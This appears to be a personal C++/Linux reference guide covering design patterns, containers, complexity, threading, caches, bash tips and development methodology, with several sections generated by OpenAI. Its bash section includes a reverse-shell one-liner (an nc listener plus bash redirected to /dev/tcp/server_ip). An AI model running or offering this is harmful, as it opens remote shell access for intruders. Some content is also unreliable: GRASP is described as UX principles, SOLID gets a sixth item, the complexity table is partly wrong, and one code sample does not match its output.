Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Sat Sep 23 04:05:44 UTC 2023

Forward

An ode to C++

Let’s start with a haiku written by a computer.

C++ is powerful
Creating programs with ease
Coding delightfully

This reference is a distillation of 15+ years of online logbook notes into only the essentials that have continued to remain relevant as a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevents me focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.


Design patterns

Design patterns provide a way to solve common software design problems in a structured and reusable way. They are used to document existing solutions to common software problems and provide a common language for software engineers to communicate design solutions. Design patterns are generally used as a way to structure code, improve maintainability, and promote code reuse.

Categories

Common patterns

  1. Singleton
  2. Factory
  3. Adapter
  4. Decorator
  5. Observer
  6. Strategy
  7. Facade
  8. Command
  9. Template Method
  10. Iterator

Factory pattern

The factory design pattern is a creational pattern that defines an interface for creating objects without specifying the exact class of the object to be created. It is used when a class does not know what kind of objects to create and can instead delegate to a factory object the responsibility of deciding which class to instantiate. The factory pattern also allows for the encapsulation of object creation logic, making code more maintainable and extensible.

Example of factory pattern

Store a system configuration in an external text file and construct at runtime using the factory pattern.

Visitor pattern

The Visitor Design Pattern is a behavioral design pattern that allows for the separation of an algorithm from an object structure on which it operates. It is used to define a new operation on a structure without changing the structure. The pattern involves a visitor object which is created so that it can traverse the existing object structure. During the traversal, the visitor performs the required operation on the elements of the structure. The visitor also provides the ability to define new operations without changing the classes of the elements on which it operates.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch in subtype polymorphism is a technique that allows a method to be dispatched based on the runtime types of two or more of its arguments rather than just the type of the object on which the method is invoked. The concept of double dispatch is based on the idea that when a method is invoked on an object, the object’s type is used to determine which implementation of the method is used. With double dispatch, two objects are involved and the types of both objects are taken into consideration when selecting the appropriate implementation. This allows for more powerful and flexible code that can handle different combinations of objects more efficiently.

Example of visitor pattern

Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.

Reflection

“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a software design principle that states that high-level modules should not depend on low-level modules, but instead both should depend on abstractions. This principle helps to decouple software components and make them more maintainable and extensible.


Argument dependent lookup (aka Koenig lookup)

Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.

Notice begin and end parameters don’t specify a namespace, see ADL.

#include <iostream>
#include <vector>
#include <iterator>

int main() {

    const std::vector v{1, 2, 3, 4, 5};
    std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "n"));
}

The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 10003 rather than 220 because it makes their performance look better.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action Duration (nanoseconds)
L1 cache read, variable increment <1
Branch misprediction (how do you measure this?) 5
L2 cache read, std::atomic 10
std::mutex/scoped_lock 20
Fetch from main memory 100
Semaphore acquire 200
Send 2KiB over 1Gbps network 20,000
Create a std::thread 20,000
Send packet from US to Europe and back 200,000,000

The C++ Standard Library containers

The C++ Standard Library containers provide a set of powerful, efficient, and easy-to-use containers to hold data, allowing developers to quickly and easily manage large amounts of data without having to roll their own container implementations. It also provides a set of algorithms that allow developers to perform common tasks on the data such as sorting, searching, and modifying elements. Additionally, the containers provide memory management capabilities such as automatic deallocation of unnecessary memory, making them a great choice for applications with large data sets.

  1. std::array
  2. std::vector
  3. std::deque
  4. std::list
  5. std::forward_list
  6. std::stack
  7. std::queue
  8. std::priority_queue
  9. std::map
  10. std::set
  11. std::multimap
  12. std::multiset

Categories of containers

Sequence containers store elements in a particular order, and access to elements is based on their position. Examples of sequence containers are std::vector, std::deque, and std::list. Associative containers store elements based on a key, and access to elements is based on the key. Examples of associative containers are std::map, std::set, and std::unordered_map.

Choosing a container


Parallelism

Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.

Kinds of parallelism

The iron law of performance!

See wikipedia.

time/program = instructions/program * clockCycles/instruction * time/clockCycles

Amdahl’s law

Amdahl’s law is a principle of parallel computing which states that the speedup of a program or system using multiple processors in parallel computing relative to using a single processor is limited by the time needed for the sequential fraction of the program. It was developed by Gene Amdahl in 1967. The law states that the speedup of a program, S, using p processors is given by:

S = 1 / (f + (1-f)/p)

Where f is the fraction of the program that can be made parallel and p is the number of processors used. This means that the speedup of a program increases with the number of processors up to a certain point, beyond which adding more processors will not result in any further increase in speedup.

It’s very easy to optimise the bits your are familiar with but not obvious how much your efforts will benefit the overall process: spend your time on the bottlenecks.

What are the most difficult concepts in computer science?


C++ linkage

Internal Linkage: Internal linkage is a property of an identifier (name of a variable, function or class) that prevents it from being visible to code outside its translation unit. This means that it can only be used within the source code file it is declared in.

External Linkage: External linkage is a property of an identifier that allows it to be visible and accessible to other source code files. This means it can be used in multiple source files and even across multiple projects.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.

http://www.modernescpp.com/index.php/c-20-static-initialization-order-fiasco

If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.

Anonymous namepsaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;
}

Complexity

You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.

Complexity Description
O(1) Constant time (no looping)
O(log n) Logarithmic time (divide and conquer)
O(n) Linear time (one loop)
O(n log n) Log linear time (multiple loops)
O(n^2) Quadratic time (nested loops)
O(2^n) Exponential time (recursive calls)

Comparing two fundamental data structures

Linked lists have an average complexity of O(n) for most operations, such as insertion and deletion. Arrays have an average complexity of O(1) for most operations, such as access and search. However, insertion and deletion in arrays can be slow, as the entire array may need to be shifted to make room for new elements.


The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting; even better, don’t bother and let clang-format do it
  5. Make everything constant, it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if:

See the complete article.


Data structures

It’s important to know the common data structures and their characteristics.

  1. Array
  2. Linked List
  3. Stack
  4. Queue
  5. Tree
  6. Graph
  7. Hash Table
  8. Heap

std::vector

std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
    struct fax {
        // Default constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; };
        fax(fax&&) { std::cout << x << " move ctor\n"; };

        // Assignment constructors
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment ctor\n";
            return *this;
        }
        fax& operator=(fax&&) {
            std::cout << x << " move assignment ctor\n";
            return *this;
        };

        const size_t id = x++;
    };

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (size_t i = 0; i < 3; ++i) {
        y.push_back(fax{});
    std::cout << "-- capacity " << y.capacity() << " --\n";
    }

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});
}
}

See the program output (below), note how the capacity is growing exponentially (doubling each time).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then call the copy constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new container. Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

Binary search trees have an amortized complexity of O(log n) unless the tree is unbalanced. Worst case, if the tree is unbalanced, then it is O(n). std::set and std::map are implemented using a red-black tree, a type of balanced binary search tree. C++23 introduces std::flat_map which is implemented using contiguous storage to make it more cache-friendly.

A binary search tree is a type of data structure that is used to store data in an ordered fashion. It consists of nodes that contain a data element, and each node has two branches: a left branch and a right branch. The data element of each node is compared to the data element of its parent node, and the data elements of the left branch are always smaller than the data element of its parent node, while the data elements of the right branch are always larger than the data element of its parent node. The nodes are arranged in such a way that a search for a specific data element can be done quickly. The time complexity of a binary search tree is O(log n).

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.

Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of slots – known as “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.

Heaps

A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

Support of random access iterators is required to keep a heap structure internally at all times. A min heap is also a sorted list.

123456789abcedef
1
23
4567
89abcdef

Project down, the top of the tree is a smallest element.

       1
   2       3
 4   5   6   7  
8 9 a b c d e f
       1
      / \   
     /   \  
    /     \ 
   2       3
  / \     / \
 4   5   6   7  
/ \ / \ / \ / \
8 9 a b c d e f

Comparison of heaps and binary search trees

A heap is a type of tree-based data structure in which the root node is the largest (or smallest) element in the tree. It has no specific order among siblings and therefore no particular path to any element. It is commonly used for priority queues and implementing heapsort.

A binary search tree (BST) is a type of tree-based data structure that is used to store data in a sorted manner. It has a specific order among siblings and follows a particular path from the root node to any element. It is commonly used for searching, deleting, and inserting data efficiently.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means search the whole list, therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::list is a doubly linked list.

C++ Standard Library container complexities

Container Type Insertion Deletion Access Search
vector O(1) O(n) O(1) O(n)
list O(1) O(1) O(1) O(n)
deque O(1) O(n) O(1) O(n)
set O(log n) O(log n) O(log n) O(log n)
multiset O(log n) O(log n) O(log n) O(log n)
map O(log n) O(log n) O(log n) O(log n)
multimap O(log n) O(log n) O(log n) O(log n)

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything.


Hash functions

A hash function is a mathematical algorithm that maps data of arbitrary length (often called a "message") to a fixed length output (often called a "hash value" or "hash code"). Hash functions are primarily used to index and verify data integrity. They are widely used in cryptography, digital signatures, and data integrity validation.

Properties of a hashing algorithm

String hashing


SOLID

  1. Single Responsibility Principle (SRP): A class should have only one responsibility and one reason to change.

  2. Open-Closed Principle (OCP): A class should be open for extension, but closed for modification.

  3. Liskov Substitution Principle (LSP): Subtypes should be substitutable for their base types.

  4. Interface Segregation Principle (ISP): Clients should not be forced to depend on methods they do not use.

  5. Dependency Inversion Principle (DIP): High-level modules should not depend on low-level modules; they should both depend on abstractions.

  6. Separation of Concerns (SoC): Different aspects of a program should be separated into different components.

GRASP

Less common but another set of principles to consider.

  1. Design for People: Design solutions with human needs and context in mind.

  2. Make It Accessible: Take into account the needs of all users, including those with disabilities.

  3. Balance User Needs and Business Goals: Make sure the product meets users’ needs while providing value to the business.

  4. Provide Clear and Useful Feedback: Ensure users understand what’s happening every step of the way.

  5. Make It Usable: Make the product easy to use.

  6. Respect the User’s Time: Keep user tasks as efficient as possible.

  7. Optimize for Learning: Design for easy onboarding and ongoing use.

  8. Design for Error: Anticipate user mistakes and provide graceful ways to recover from them.

  9. Support the User’s Memory: Help users remember their progress and choices.

  10. Facilitate Accomplishment: Help users achieve their goals. ___

Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform dependent interface.

See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?

Ways to create a thread

std::async

Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. Quite a nice way to reference the result of a calculation executed in another thread. Also, it manages the issue of creating too many threads – they will just be executed sequentially – and exceptions thrown in the asynchronous routine destroy the future and the exception propagates out into the calling get() and is rethrown.

std::thread

You need to call join() for every thread created with std::thread. Typically it’s done by storing your threads as a vector and joining each of them in a loop.

std::jthread

Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.

C++ algorithms that can take an execution policy

Some of these have an _if version that takes a additional predicate: e.g., std::replace and std::replace_if.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate

Acquiring resources

std::mutex

A standard way to protect access to something, but there are multiple ways to unlock it.

Acquiring multiple resources

Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not become stuck, see the deadlock chapter for more.

You can use std::scoped_lock with multiple resources or single, but I think they express intention better, by virtue of having “scope” in the name.

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

#include <iostream> 
#include <thread> 
#include <mutex> 
#include <condition_variable> 
#include <queue> 

// Create a queue to hold data 
std::queue<int> q; 

// Create a mutex for synchronization 
std::mutex m; 

// Create a condition variable 
std::condition_variable cv; 

// Function to produce data 
void producer() 
{ 
    int count = 10; 
    while (count > 0) { 
        // Acquire lock 
        std::unique_lock<std::mutex> l(m); 

        // Push data into queue 
        q.push(count); 

        // Notify the condition variable 
        cv.notify_one(); 

        // Release lock 
        l.unlock(); 

        // Reduce count 
        count--; 
    } 
} 

// Function to consume data 
void consumer() 
{ 
    int data = 0; 
    while (data != 1) { 
        // Acquire lock 
        std::unique_lock<std::mutex> l(m); 

        // Wait till queue is not empty 
        cv.wait(l, [] {return !q.empty(); }); 

        // Pop the data from the queue 
        data = q.front(); 
        q.pop(); 

        // Release lock 
        l.unlock(); 

        // Print the popped data 
        std::cout << \"Data: \" << data << std::endl; 
    } 
} 

// Main 
int main() 
{ 
    std::cout << \"Producer-Consumer Problem\" << std::endl; 

    // Create producer and consumer threads 
    std::thread t1(producer); 
    std::thread t2(consumer); 

    // Wait for both threads to finish 
    t1.join(); 
    t2.join(); 

    return 0; 
}

bash

As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.

git

git is awesome on the command line and pretty much essential. Use it to manage your chores. See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)
shuf -n 1 readme.txt

From bash 5.

echo $EPOCHREALTIME
1614870873.574544

echo $EPOCHSECONDS
1614870876

uptime

The three load average values are 1, 5 and 15 minutes.

uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51

stress

Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -

OpenAI generated interview questions

  1. What is the most interesting problem you have ever solved?

  2. What is your experience with algorithms and data structures?

  3. What is your experience with software development lifecycles?

  4. How do you debug a complex programming issue?

  5. What tools and techniques do you use to keep up with the latest trends in computer science?

  6. What are the differences between C and C++?

  7. What is the main purpose of a constructor in a class?

  8. Explain the concept of polymorphism in C++.

  9. Explain the use of templates in C++.

  10. What is the difference between a stack and a queue?


Caches

Processor caches are small, fast memory caches that are used to store frequently used data and instructions. Caches store this data closer to the processor, allowing it to be accessed more quickly. Processor caches are usually split into two levels, the Level 1 (L1) cache and the Level 2 (L2) cache. The L1 cache is the fastest and smallest cache, and is usually integrated into the processor. The L2 cache is larger and slower than the L1 cache, and is usually located further away from the processor.

Cache coherence

Cache coherence is a set of protocols and algorithms that manage the consistency of data stored in multiple levels of a computer memory hierarchy. It ensures that when multiple processors or cores in a system access the same memory location, they see the same data and any changes made by one processor are immediately visible to the other processors. This is necessary for maintaining data integrity and avoiding race conditions. Cache coherence protocols also ensure that caches are kept up to date with the contents of main memory, so that each processor has access to the most current data.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

Cache misses occur when a requested data item is not found in the cache. This results in a longer memory access time as the computer must fetch the data from a slower storage device such as main memory or disk. Cache misses can be caused by a variety of factors, including cache size, data layout, and memory access patterns.

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.

Data-oriented design

Design to get the most value out of every single cacheline that is read. Split apart the functions and data.

Cache locality

Cache locality is the phenomenon in which data and instructions that are referenced together and nearby each other in memory are also likely to be requested from the processor cache together. This phenomenon helps to reduce the amount of time the processor spends waiting for data and instructions to be fetched from main memory, as the data and instructions are more likely to already be present in the cache. Cache locality is important for optimizing performance in modern computer systems as it can lead to significant performance gains.

Further reading


Object-oriented programming

Object-oriented programming (OOP) is a programming paradigm based on the concept of "objects", which can contain data, in the form of fields, and code, in the form of procedures. A feature of objects is an object’s procedures that can access and often modify the data fields of the object with which they are associated. OOP also commonly uses classes, which allow objects to be grouped together to form models of data and procedures, as well as inheritance, which allows classes to be based on other classes, thereby allowing them to share and/or override certain characteristics.

Polymorphism

  1. Ad-hoc polymorphism: Ad-hoc polymorphism is a type of polymorphism in which the function signatures are the same but the implementations are different. It is also known as function overloading or operator overloading.

  2. Parametric polymorphism: Parametric polymorphism is a type of polymorphism in which a single function can be used for multiple data types. It is also known as generics or generic programming.

  3. Subtype polymorphism: Subtype polymorphism is a type of polymorphism in which a derived type is considered to be a subtype of its parent type. It is also known as inheritance or subtyping.

  4. Coercion polymorphism: Coercion polymorphism is a type of polymorphism in which a function can be used with arguments of different types. It is also known as implicit type conversion or type conversion.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.

Virtual tables

A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)

A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.

RAII

RAII (Resource Acquisition Is Initialization) is a programming technique that uses the scope of an object to manage the lifetime of a resource. It ensures that when an object is initialized, its resources are acquired, and when the object is destroyed, its resources are released. This technique is commonly used in C++ and other object-oriented languages to manage memory, locks, file handles, network connections, and other resources. RAII ensures that the resources are released even in the event of an exception or error. ___

Algorithms

The Jonathan Boccara CppCon 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.

Sorting

Quicksort is the poster boy of sorting algorithms.

The average-case time complexity of Quicksort is O(n log n). It is a divide and conquer algorithm, which works by partitioning the array into two parts and then recursively sorting each part. In the best case, the time complexity is O(n log n). However, in the worst-case scenario, the time complexity is O(n2).

Below is a Python implementation just for fun. But how is it implemented in C++?

def quicksort(arr):
    if len(arr) <= 1:
        return arr
    pivot = arr[len(arr) // 2]
    left = [x for x in arr if x < pivot]
    middle = [x for x in arr if x == pivot]
    right = [x for x in arr if x > pivot]
    return quicksort(left) + middle + quicksort(right)

print(quicksort([3,6,8,10,1,2,1]))

std::sort uses Introsort

Introsort is a hybrid sorting algorithm which combines quick sort, heap sort, and insertion sort. It is a form of an unstable sorting algorithm, meaning that the relative order of equal elements is not necessarily preserved. It begins with quick sort and as the recursion depth increases it switches to heap sort. Once the recursion depth reaches a certain point the algorithm switches to insertion sort which is efficient for small datasets. The algorithm is an improvement over quicksort as it cuts down on the worst-case complexity of O(n^2) and can be used for sorting large datasets.

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n ∗ logn). However, if it fails to allocate, it will degrade to an O(n ∗ logn ∗ logn) algorithm.

https://leanpub.com/cpp-algorithms-guide

Small array threshold

The threshold for switching to insertion sort varies for each compiler.

std::list

std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.

Other sorting algorithms

Considerations for choosing an algorithm: size of input, Type of input: e.g., partially sorted, random.

The complexity of sorting algorithms can vary significantly. Bubble Sort has a complexity of O(n^2), Insertion Sort has a complexity of O(n^2), Selection Sort has a complexity of O(n^2), Merge Sort has a complexity of O(n log n), Quick Sort has a complexity of O(n log n), and Heap Sort has a complexity of O(n log n).

It is important to note that the complexities listed above are worst-case complexities. In some cases, the sorting algorithm may have a better complexity depending on certain conditions that may be present.

In general, Merge Sort, Quick Sort, and Heap Sort are the most efficient sorting algorithms, as they have the best complexity of O(n log n). Bubble Sort, Insertion Sort, and Selection Sort are less efficient, as they have a complexity of O(n^2).

All of these are Θ(n log n) in all cases apart from Timsort has a Ω(n) and Quicksort has a terrible O(n^2) (if we happen to always pick the worst pivot). Quicksort is a good all rounder with O(n log n) average case. But it does have a O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully but an example could be constructed where the chosen pivot is always the worst case.

References

C++ standards

As of 7 September 2023: > The big things for me are ranges and views, so effortlessly express and manipulate ranges of data with zero iterators; they read naturally and are also lazy-evaluated (looking forward to ranges_to<>'). Concepts I've used a little, but mostly to narrow the allowed types of an auto parameter: e.g.,std::floating_point auto`.

I’ve attempted to get into template a few times and it’s really quite an unpleasant language! However, whilst not a recent addition, constexpr is becoming increasingly supported, and I really like how it finds UB at compile time. However, you quickly hit the issue where something isn’t constexpr so you have to either implement it yourself or not bother.

Coroutines are quite high-profile but I haven’t got into them yet.

Finally, the multidimensional array operator should be an interesting addition.

Things that are in the standard but aren’t properly supported: modules haven’t yet been implemented sufficiently in gcc or clang. std::print is really cool but you still need to install a separate library (fmtlib).

Notable mentions from C++17 are structured bindings and execution policy.

C++23

See the presentation by Marc Gregoire (CppCon 2022).

Not implemented yet

Not supported in gcc 13.2.

Ranges and views (part two)

A lot of effort has gone into ranges and views C++23.

std::ranges

std::views

C++20

C++17

Also see cppreference.

C++14

C++14 is an extension and improvement of C++11.

C++11


Networking

“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer # Layer Name
1 Physical
2 Data Link
3 Network
4 Transport
5 Session
6 Presentation
7 Application

Three way handshake

The TCP three-way handshake is a process used by TCP/IP networks to establish a connection between two hosts. It consists of three steps:

  1. The initiating host (Client) sends a SYN (synchronize) packet to the receiving host (Server).

  2. The receiving host responds with a SYN-ACK (synchronize-acknowledge) packet.

  3. The initiating host sends an ACK (acknowledge) packet to the receiving host, completing the three-way handshake.

SYN stands for “synchronise”.

=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK

Move semantics

This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.


The Software Development Life cycle (SDLC)

Waterfall versus agile

Construction of a building is often used to describe the software design process. But the analogy breaks down the building designer only has one attempt to compile the building. You can’t swap out the foundation halfway through.

Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.

Software validation versus verification

Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

Verification is objective (quality), validation is subjective (customer needs).

Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

See difference between verification and validation.

Waterfall sequence

RADCTDM

Advantages

Disadvantages

When should you use waterfall methodology?

Agile

BDD

What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.

Resources

TDD

Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved to pass the new tests, only. This is opposed to software development that allows software to be added that is not proven to meet requirements.

As a [X] I want [Y] in order to [Z]

Title: Customer withdraws cash

Scenario 1: Account is in credit


Multithreading

Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.

Why use multithreading? For performance and/or separation of concerns.

Reentrancy

A routine can be described as reentrant if it can be interrupted without an not leave the operation partially complete: the invariants remain true.

Invariants

A good way to reason about your code is to consider the invariants that must be true at any given point in time. For a linked list, node A’s next pointer must point to node B and node B’s previous pointer must point to node A. However, if you are deleting an element from a linked list there will be a period where this invariant does not hold, and you must acquire mutual access to both nodes whilst the list is being updated; otherwise another thread may see the list in an invalid state.

OpenAI: Invariants are mathematical statements that remain true under a given set of conditions. They are used to describe properties of systems that remain true over time, or under certain operations or transformations. Invariants can be used to prove the correctness of algorithms or to analyze the behavior of systems.

Idempotence

A function is idempotent if it can be applied multiple times without changing the outcome. E.g., repeatedly pressing the “on” switch of an “on/off” pair: it’s still on. See Wikipedia.

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

OpenAI: A race condition is a type of software bug that occurs when two or more threads of execution access the same shared resource, such as a data structure, at the same time, and the outcome of the program depends on the exact time of access. Race conditions can lead to unexpected or incorrect results. For example, if two threads are both trying to increment the same shared variable at the same time, the end result may be either the original value plus one, or the original value plus two, depending on which thread finishes first.

Considerations

Deadlocks and livelocks

See the Dining philosophers problem.

A real world example: Ken and Barbie walk over to the barbecue. Ken grabs the last remaining sausage and attempts to acquire the hot sauce; meanwhile, Barbie has already secured the hot sauce and is waiting for the sausage to become available. A sausage cannot be enjoyed without hot sauce, so neither can proceed and remain stuck in a deadlock indefinitely.

A livelock occurs when measures are taken to avoid a deadlock, but the measures themselves do not resolve the conflict. For example, Ken and Barbie both agree to put down their respective items and try again; however, they both pick up the same item agains and the deadlock continues.

OpenAI: A deadlock is a situation in which two or more processes are blocked forever because each process is waiting for the other one to finish. A livelock is a situation in which two or more processes are continuously trying to communicate but none of them are making any progress. In a deadlock, the processes are blocked, whereas in a livelock, the processes are still active but none of them are making any progress.

Avoiding deadlocks

Run your code on different numbers of CPUs; it’s interesting how the bottlenecks move around depending on the available resources.

OpenAI: 1. Ensure that all transactions are short and atomic. 2. Use appropriate isolation levels. 3. Order the commands within a transaction in the same way for all transactions. 4. Use timeouts to prevent transactions from waiting indefinitely. 5. Monitor locks to identify potential deadlocks. 6. Use lock escalation strategies. 7. Use deadlock detection and resolution algorithms. 8. Allow transactions to cancel and restart. 9. Avoid nested transactions.

See also

Additionally

Synchronising threads

